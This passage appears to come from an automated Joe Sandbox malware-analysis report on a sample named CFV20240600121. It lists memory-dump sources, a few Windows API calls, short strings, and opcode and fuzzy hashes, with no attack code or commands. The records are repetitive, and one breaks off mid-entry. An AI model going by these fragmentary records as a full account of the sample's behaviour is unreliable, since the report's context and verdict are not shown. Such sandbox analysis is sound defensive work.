                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 056FB2DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 058082C5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A13FDB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        APIs
                                        • OleInitialize.OLE32(00000000), ref: 058082C5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Initialize
                                        • String ID:
                                        • API String ID: 2538663250-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: V
                                        • API String ID: 0-1342839628
                                        • Opcode ID: a411d2152a029b9d162fcb1efa7a05b121c381f52c311d051da2105a3b34788c
                                        • Instruction ID: 43b8a7bf0d856b67512d47a0962353730e0bbb20cc3ecaf56be142e15fde9ca3
                                        • Opcode Fuzzy Hash: a411d2152a029b9d162fcb1efa7a05b121c381f52c311d051da2105a3b34788c
                                        • Instruction Fuzzy Hash: 5D517DB0914209CFEF16CF59C6407BDBBB2AF86345F088866E566DB285C7758D40CB71
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: k
                                        • API String ID: 0-140662621
                                        • Opcode ID: d76f6dc46964980076b71656a95efd078c25ba74f4f8a4e90a23997bd278f2e3
                                        • Instruction ID: 9906142400bed3ec0fefd012d85c1314e69cc2c7d320b475a77afbfff55d59da
                                        • Opcode Fuzzy Hash: d76f6dc46964980076b71656a95efd078c25ba74f4f8a4e90a23997bd278f2e3
                                        • Instruction Fuzzy Hash: C6212C5285E3E05FD713AB3C99B45C53F65AF53214F0A00E7C8D49F0A7E64A885CC3AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        • Opcode ID: 848db4295e7ce1ad2b6f07852e1cd235b025b3c93124704ce8706e8a2ea5f925
                                        • Instruction ID: f9e2c4aa17864a1ac7eef4918bdcc3b1da816fd70ea5c29becf273b82ef77525
                                        • Opcode Fuzzy Hash: 848db4295e7ce1ad2b6f07852e1cd235b025b3c93124704ce8706e8a2ea5f925
                                        • Instruction Fuzzy Hash: 37114CB1F0021A8BCB04EBB999115FEB6F6AFC8650F604479C516E7240EB358E02CBA5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: x=
                                        • API String ID: 0-1631010296
                                        • Opcode ID: abcc6688a3b47cd964721c442cf0f8c0a3916eab6638b2e1b5411b82233fb5b7
                                        • Instruction ID: 128e552ccf31824ffb662688fef20a7f661223042e0ba28e1b9713d2c640fc7b
                                        • Opcode Fuzzy Hash: abcc6688a3b47cd964721c442cf0f8c0a3916eab6638b2e1b5411b82233fb5b7
                                        • Instruction Fuzzy Hash: 5001ECB0D0021ADFDB24CF6AC8447EE7AF5BF49360F208625E825EA190D7744A84CBD1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9d77a06ac0b12e4a25752e0d5d9f37bccab7298f64419b2b71e600b136c8fe2a
                                        • Instruction ID: a0a387d828fc69772028708b714cf15bf127e700ac1494dd9852bd2e1e259f34
                                        • Opcode Fuzzy Hash: 9d77a06ac0b12e4a25752e0d5d9f37bccab7298f64419b2b71e600b136c8fe2a
                                        • Instruction Fuzzy Hash: 29A10470600205CFC715CF69D8449AAFBFAFF85354F14896AD44ACB252DB30ED8ACBA0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf8d65c934e4583d9047c4150633d4fffe8bc9ebf010bba49b80155d842dcdbc
                                        • Instruction ID: aa987d451baef01008855493590c887de453b6bb3204a0864e202b95c731b96b
                                        • Opcode Fuzzy Hash: bf8d65c934e4583d9047c4150633d4fffe8bc9ebf010bba49b80155d842dcdbc
                                        • Instruction Fuzzy Hash: 8E91CFB0A00606CFCB15CF68C5849AABBF6FF85320F54C969D45A8B255DB30ED49CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc21ba06074c88a211a269fe783d721b972bd589277405a05adc9e0fc4d8528f
                                        • Instruction ID: 588db922a62fbedb04d35066f33b655cd726dec0548c89f4f7f1d689d54da595
                                        • Opcode Fuzzy Hash: cc21ba06074c88a211a269fe783d721b972bd589277405a05adc9e0fc4d8528f
                                        • Instruction Fuzzy Hash: 0E9188B4E0020A9FDB44DFA8D9849DDBBB6FF88300F208669D519AB359D731AD45CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cc5768003ea756f3d496c77a9bc4b49a0652fa5cf50df1b67fdf71a69470b4de
                                        • Instruction ID: 01a810844cbd2452a7459310f849e473c0bacfce69708a3ca4b0ac79059031db
                                        • Opcode Fuzzy Hash: cc5768003ea756f3d496c77a9bc4b49a0652fa5cf50df1b67fdf71a69470b4de
                                        • Instruction Fuzzy Hash: 1B7182B1A05255CFDB16CF68C584A6DFBF6FF853A0F058A96D051AB2A6C334EC40CB60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3a10df7548e039cb6c10bc9b21abaf1c86e2077436272aeb2b21f3a7263f7347
                                        • Instruction ID: 23d219f8a6862b9f5481705174dd0e1841f96e64842a3c0e788767c362fe2047
                                        • Opcode Fuzzy Hash: 3a10df7548e039cb6c10bc9b21abaf1c86e2077436272aeb2b21f3a7263f7347
                                        • Instruction Fuzzy Hash: F47171B1A05215CFDB15CF68C584E69F7F6FF853A0F158A96D052AB2A6C330EC40CB60
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 941180effbd0784f0a337400f75b036ba682b42b79afa52163924b92404677b3
                                        • Instruction ID: 3205a3419a0a4121503ff67ab0f8d9e1d3ad68d35d33c8db441c44e281e3b332
                                        • Opcode Fuzzy Hash: 941180effbd0784f0a337400f75b036ba682b42b79afa52163924b92404677b3
                                        • Instruction Fuzzy Hash: 1B31E0B4909B80CFC3229B38A5641447FF1BF8630270A89DBC5C5CBAB3C7399859C716
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2121166086.000000000DC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DC30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_dc30000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d6ff5da0952a30e2778cb7665c8862371d1fddda5669b0140fead1cfe486f063
                                        • Instruction ID: be9aa6ddfb786a564165b83bf5a241aa6ef62036f367a0ebe4028ddac36cf3ce
                                        • Opcode Fuzzy Hash: d6ff5da0952a30e2778cb7665c8862371d1fddda5669b0140fead1cfe486f063
                                        • Instruction Fuzzy Hash: 23413871D0921A9FCB00CFA6D5416AEFBB5BF89200F10D4AAD019A7255D3388B00DF66
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2121166086.000000000DC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DC30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_dc30000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1278d7c49cb15348b1fef75ba2151fef08a764471dbcc5c09ae3b335dd2f189c
                                        • Instruction ID: 349518532b91b2135cc3c438e85f50fc4351c4a7d829230ac6f65a37a0625e17
                                        • Opcode Fuzzy Hash: 1278d7c49cb15348b1fef75ba2151fef08a764471dbcc5c09ae3b335dd2f189c
                                        • Instruction Fuzzy Hash: F74125B1D0521EDFCB04CFA6D5416AEFBF6BB89200F10D46A9019B7254E3789B00DFA5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: beeb865a936b1cff545d83f9818ef3c1ff6ebc03cc36b12cf75d1102c7e29a8d
                                        • Instruction ID: aaffe0f80a8c8b0ac64ee35a8fd10fb20f9acbb458083b584dace1e66e8a5985
                                        • Opcode Fuzzy Hash: beeb865a936b1cff545d83f9818ef3c1ff6ebc03cc36b12cf75d1102c7e29a8d
                                        • Instruction Fuzzy Hash: F63112B4E012099FCB04CFA9D8445EEBBB2FF89350F10842AE926A7768D7349941CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b283bcf0d53215afb30c3ecacd69516bc4aaa536db0ca7af2e092c10998f3ea
                                        • Instruction ID: 767f118cf2059dd79cd230d21d22c46a8eb455964d9d845f5828fb336f321ff6
                                        • Opcode Fuzzy Hash: 1b283bcf0d53215afb30c3ecacd69516bc4aaa536db0ca7af2e092c10998f3ea
                                        • Instruction Fuzzy Hash: 532128726046409FCB168F18D8849AABBB2FF85350B148D9FF685CB263C732DD42CB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e1a8d8eb2f971cad5a8dc50820b29218df1f89e2a7e2af68120bfa107090ac2
                                        • Instruction ID: eacb91fc104191c5fcd2a9b1965ad45bad3f878ee8107a7a5e6570f764949681
                                        • Opcode Fuzzy Hash: 0e1a8d8eb2f971cad5a8dc50820b29218df1f89e2a7e2af68120bfa107090ac2
                                        • Instruction Fuzzy Hash: A03126B4E05209EFCB44DFAAC5451AEBBF2FB89340F14C8AAC405E7258E7359E418B91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2087484250.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_176d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f13dfb054cb73944c856145a8d3e28d643de16958fa820f653e86585cea689b7
                                        • Instruction ID: d015eb58bbf437d14ea63f29ed57554361d9bdfcaa2f625ef05dd5f37b1d115e
                                        • Opcode Fuzzy Hash: f13dfb054cb73944c856145a8d3e28d643de16958fa820f653e86585cea689b7
                                        • Instruction Fuzzy Hash: 6B2136B1210244DFDB25DF98C9C0F56FF69FB98314F24C1A9DD490B256C33AE806C6A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2087484250.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_176d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80b1801d38ba684291ba01a596efa6625f189cf91badc654b2b8a2ebf7b5000c
                                        • Instruction ID: bc6834f872bfd9a80702aceb9d71d189d0493587082834f25ce19f3b912d406e
                                        • Opcode Fuzzy Hash: 80b1801d38ba684291ba01a596efa6625f189cf91badc654b2b8a2ebf7b5000c
                                        • Instruction Fuzzy Hash: 7E21E271610240DFDB25DF58D980B26FF69FB88318F2485A9ED490A657C336D416C6A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088601460.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_177d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 878ac797369093954560c9e751337435dcaf100c05b7b5d9ae9bfcd3ad93704c
                                        • Instruction ID: a6bb9e991022eff27b2180a0fce978d899516baac67a0c8e96721451fc43903d
                                        • Opcode Fuzzy Hash: 878ac797369093954560c9e751337435dcaf100c05b7b5d9ae9bfcd3ad93704c
                                        • Instruction Fuzzy Hash: 2D21B3716082049FDF25DF98D580B26FB65FF88324F24C5ADD9494B256C33AD446CA61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2088601460.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_177d000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 553ae8dfcbe94be25c523d94942d5b43cf30c3055e60d97eb83dfb916fe0d64e
                                        • Instruction ID: 1372b4b22175d398d52410819e048c0a478167ba97827a14b80f4dc7ceb3bd76
                                        • Opcode Fuzzy Hash: 553ae8dfcbe94be25c523d94942d5b43cf30c3055e60d97eb83dfb916fe0d64e
                                        • Instruction Fuzzy Hash: A6210071604204DFCF26DFA8D984B26FF65EF88314F20C5ADD90A0B256C33AD406CA61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 400a3c5da869a550a2d2524019e4388ca6cea4d9da5c9ef341075729d545bfbf
                                        • Instruction ID: b386b177d341b5f8c6217985268715a54723a820129d89c14bec61ff8a16e6ab
                                        • Opcode Fuzzy Hash: 400a3c5da869a550a2d2524019e4388ca6cea4d9da5c9ef341075729d545bfbf
                                        • Instruction Fuzzy Hash: 7021D5B4E05209DFCB44DFAAD5452AEBBF2FB89340F11C86A8805E7358E7359E418B91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: de39a9db27033f47a27fd1003b72aa4faacee28d12cc7392110cb885a4301bc9
                                        • Instruction ID: 4786f24b2f8f332363fbfb4b258208df7fae90e7d5fa6b883cf2670fd253780d
                                        • Opcode Fuzzy Hash: de39a9db27033f47a27fd1003b72aa4faacee28d12cc7392110cb885a4301bc9
                                        • Instruction Fuzzy Hash: F7214BB0D052099FCB08CFA9C5855AEFBF2BF89340F24C5AAD415AB255E7309A41CF91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c770a067e32bc6456c7767157a6597309facaa03afe58b2ed575edc333a45d74
                                        • Instruction ID: f83f1237b5fe18ce22e4f0558f869552b3b10e7c3aeee42117c7145d7061a93c
                                        • Opcode Fuzzy Hash: c770a067e32bc6456c7767157a6597309facaa03afe58b2ed575edc333a45d74
                                        • Instruction Fuzzy Hash: CC211674E01109AFDB08DFA9C585A9EFBF2FF88300F54C4A9D419AB255D7309A15CB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 44aa9b5dfe51e8b554677a748f2a1d9e5982894fa10884909fe4e2acc4c50a17
                                        • Instruction ID: f5f5ecafea2a06625553fb21230230820d0388dc07accedbc07acb8756b4c8e7
                                        • Opcode Fuzzy Hash: 44aa9b5dfe51e8b554677a748f2a1d9e5982894fa10884909fe4e2acc4c50a17
                                        • Instruction Fuzzy Hash: C431F2B0C01218DFDB20DFA9C998B9EBFF4EB09754F24841AE415BB240C7B55845CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d49e00b8fb9467f140dabf1d79b9b13470c897c5cfc9f4c49bfb8ecfb79ec095
                                        • Instruction ID: 93ec191833c3e7a80cd93d099933914157429927cdd05742ace426e8e9d3d6af
                                        • Opcode Fuzzy Hash: d49e00b8fb9467f140dabf1d79b9b13470c897c5cfc9f4c49bfb8ecfb79ec095
                                        • Instruction Fuzzy Hash: E4310EB0D01258DFDB20CFA9C998BDEBFF0AB09314F24842AE419BB240C3B55845CFA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9a9deed7866d4f773784f57e803bbf9eb5c372e55be0fe2a06a8a39b1de656c6
                                        • Instruction ID: a73d0aa0bf99a37aaf27c9ae1d5b111d0f51234253e250da66e3a640403782ec
                                        • Opcode Fuzzy Hash: 9a9deed7866d4f773784f57e803bbf9eb5c372e55be0fe2a06a8a39b1de656c6
                                        • Instruction Fuzzy Hash: B22115B4E01109EFDB08CFA9C584A9EFBF6EF88310F54C4A9D419AB268D730DA00CB40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f8aa419565caadee35602a7d86f24ad4b1d2ec9cff34456c360b5abd8390c7ee
                                        • Instruction ID: 504bf97c7409d14d4b3709130523871be56d86f73f102bb8ad9f1d0e187ff715
                                        • Opcode Fuzzy Hash: f8aa419565caadee35602a7d86f24ad4b1d2ec9cff34456c360b5abd8390c7ee
                                        • Instruction Fuzzy Hash: EB11E5B2304540AFCB159F18D884CAABBB6FF89250B04485FF645CB662D7729D42DBA1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 45390ddcc3387dbf93871da2f185d86a9677d22f40912f2dc25ae3ab77493464
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c82845743a0f7b85508219b4e02a05970d99b1adefc9678ad6728d3401a1a3e9
                                        • Instruction ID: dedb1b9c460ebf7de3e6970588f2c5f6c24edb36d410ce529998cf379e14e7e9
                                        • Opcode Fuzzy Hash: c82845743a0f7b85508219b4e02a05970d99b1adefc9678ad6728d3401a1a3e9
                                        • Instruction Fuzzy Hash: 7CD0A9B0C1220CDFC740EBB8E90929EBBB4AB00201F5444B88909932A1EA315E10C782
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2121166086.000000000DC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DC30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_dc30000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 66e0d07ddeab49ee6477bc9acc13eb1cd86fd2b0822ff8a089620e4cbc69ac82
                                        • Instruction ID: cc36167071ade5f21b8f3fad0bd9d454c34a77816b6bc2cb3d2e16ee133a3bc8
                                        • Opcode Fuzzy Hash: 66e0d07ddeab49ee6477bc9acc13eb1cd86fd2b0822ff8a089620e4cbc69ac82
                                        • Instruction Fuzzy Hash: BFD0123725020C5E4B51EE95E800C52BBDCFB18740700C462F504C7421E722F528E792
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 185d82500fbae8c35365d48fd934127b7a407334ec962291e1c5ca4ad8f6a522
                                        • Instruction ID: 2395e64f8ecd54b016b1d189e598c4027ccdbcc51acdd6f2039a4edfa0353ce3
                                        • Opcode Fuzzy Hash: 185d82500fbae8c35365d48fd934127b7a407334ec962291e1c5ca4ad8f6a522
                                        • Instruction Fuzzy Hash: 33C080B040624C9FC350DFF5EC0C7567BBDD705217F4044B4D909C3105D7724410D656
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fe0b125800d1babcb6c1c4a98337e85db17c9e35f77281c5d32dd376b6dcc0e8
                                        • Instruction ID: 4ee75aad4154251294fae6431761b58c26c272c0c260204f2831ab74a1c476d0
                                        • Opcode Fuzzy Hash: fe0b125800d1babcb6c1c4a98337e85db17c9e35f77281c5d32dd376b6dcc0e8
                                        • Instruction Fuzzy Hash: 9DD0177090B1198FCB54CF24DA94B8CBBBAFF49200F009AA5D119A72A9E7346E85CF00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82ed838e97966995d2e7413e4897b3856a208c3323e91d8183765bd0f0ed1d33
                                        • Instruction ID: d49d1483671c996d2a786c3b0ca9cde6b95ce0df64919d5293a5123c37765d5b
                                        • Opcode Fuzzy Hash: 82ed838e97966995d2e7413e4897b3856a208c3323e91d8183765bd0f0ed1d33
                                        • Instruction Fuzzy Hash: A7B092B7B50104AF8B149AB4B80A4EDF730E7AB2B3F05A037D326D2860DA3189349A55
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e6020a88c9e9d7b0c6796927ef9acffe9c9946037cfca8fe54572bbe5dba8f56
                                        • Instruction ID: bc454d87e26e98dfe46039640a84329f8c1fed8064b8a49752ed1717e75c7218
                                        • Opcode Fuzzy Hash: e6020a88c9e9d7b0c6796927ef9acffe9c9946037cfca8fe54572bbe5dba8f56
                                        • Instruction Fuzzy Hash: 3AD06CB5601314CFCB14DF24D2949987BB3FB0A346F100598E40A9B355CB3AEA80CF00
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9fa1368c9a6b5e4a3895d4b756b146c7152af44e045aa184609464a8b9044f9f
                                        • Instruction ID: 32c848bdc0821ce1b1a1b5719e5906c9ad65525630510fdcbe1026d1229b7e3c
                                        • Opcode Fuzzy Hash: 9fa1368c9a6b5e4a3895d4b756b146c7152af44e045aa184609464a8b9044f9f
                                        • Instruction Fuzzy Hash: 37C0023214410CBBCB427A81D805E59BF6AAB55694F548055F7080D162E673D962AB91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
